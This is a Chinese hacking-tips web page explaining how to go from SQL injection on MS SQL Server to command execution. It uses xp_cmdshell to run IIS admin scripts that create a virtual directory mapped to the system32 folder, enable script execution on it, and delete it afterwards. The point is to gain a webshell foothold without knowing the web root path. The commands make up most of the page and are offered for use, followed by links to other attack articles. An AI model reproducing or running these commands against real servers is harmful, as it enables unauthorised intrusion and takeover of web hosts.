sql注入建立虚拟目录

所属分类: 实用技巧 / 漏洞研究 阅读数: 721
收藏 0 赞 0 分享
sql注入建立虚拟目录,免得找web绝对路径
----------------------------------------------------------------
我们很多情况下都遇到sql注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://xxx.com/win
403错误,表示虚拟目录建好了。。。
更多精彩内容其他人还在看

google hack dat 又增加的一些比较新的数据

google hack dat 又增加的一些比较新的数据
收藏 0 赞 0 分享

从搜索参数过滤不严到IDC虚拟主机的渗透

从搜索参数过滤不严到IDC虚拟主机的渗透
收藏 0 赞 0 分享

PollVote投票系统漏洞利用

PollVote投票系统漏洞利用
收藏 0 赞 0 分享

最新的黑客技术:XSS跨站脚本攻击详细介绍

最新的黑客技术:XSS跨站脚本攻击详细介绍
收藏 0 赞 0 分享

BBSXP5.15跨站攻击漏洞

BBSXP5.15跨站攻击漏洞
收藏 0 赞 0 分享

某省高考志愿填报系统的漏洞实战解说

某省高考志愿填报系统的漏洞实战解说
收藏 0 赞 0 分享

常用软件加密宝典之一:启动加密(图)

常用软件加密宝典之一:启动加密(图)
收藏 0 赞 0 分享

教你利用Log备份获取Webshell

教你利用Log备份获取Webshell
收藏 0 赞 0 分享

DVBBS7.1 SQL版 跨库漏洞

DVBBS7.1 SQL版 跨库漏洞
收藏 0 赞 0 分享

文件上传八大法-远程控制必看

文件上传八大法-远程控制必看
收藏 0 赞 0 分享
查看更多